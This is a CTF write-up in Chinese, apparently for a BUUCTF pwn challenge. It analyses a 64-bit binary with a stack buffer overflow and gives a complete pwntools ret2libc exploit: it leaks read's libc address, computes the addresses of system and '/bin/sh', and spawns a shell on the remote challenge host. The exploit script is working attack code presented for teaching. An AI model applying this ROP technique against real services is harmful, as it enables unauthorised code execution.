首先checksec检查保护机制:
-64位程序
-开启了栈不可执行保护
题目还附带了libc库文件,点击就能下载
接下来使用IDA反汇编分析一下:
buf到栈底的距离为0x20个字节,但是下面的read函数却读入了0x100个字节的数据,可以触发栈溢出漏洞,在IDA中发现程序没有后面函数,system或/bin/sh地址,再配合前面给的libc库,判断是要我们拿到某个函数的真实进而求出libc的基址再来计算出system和/bin/sh的地址
先拿到main函数地址,用于后面触发二次溢出:0x400636
再在Linux终端中输入一下指令:
拿到rdi地址:0x400733,用于调用函数,ret地址:0x4004d1,用于栈对齐
ROPgadget --binary pwn --only "pop|ret"然后开始编写exp攻击脚本:
基本思路是通过两次栈溢出拿到shell,第一次栈溢出先泄露出read函数的真实地址,然后计算出libc基址,进而求出system函数地址和/bin/sh地址,然后第二次栈溢出注入system函数拿到shell,都是ROP链的构造
from pwn import * context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',26311) # 与在线环境交互。 offset = 40 main_addr = 0x400637 ret_addr = 0x4004d1 rdi_addr = 0x400733 elf = ELF("./pwn") read_got = elf.got['read'] printf_plt = elf.plt['printf'] libc = ELF("./libc.so.6") io.recvuntil(b'What\'s your name? ') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(read_got) + p64(printf_plt) + p64(main_addr) io.sendline(payload) io.recvline() read_addr = u64(io.recvuntil(b'W')[:-1].ljust(8,b'\x00')) print(hex(read_addr)) libc_base = read_addr - libc.sym['read'] system_addr = libc_base + libc.sym['system'] bin_sh_addr = libc_base + next(libc.search(b'/bin/sh')) io.recvuntil(b'name? ') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()这是运行结果:
这里直接输入cat flag是拿不到flag,因为flag不在根目录下,跟着我下面的指令输入就可以拿到flag了
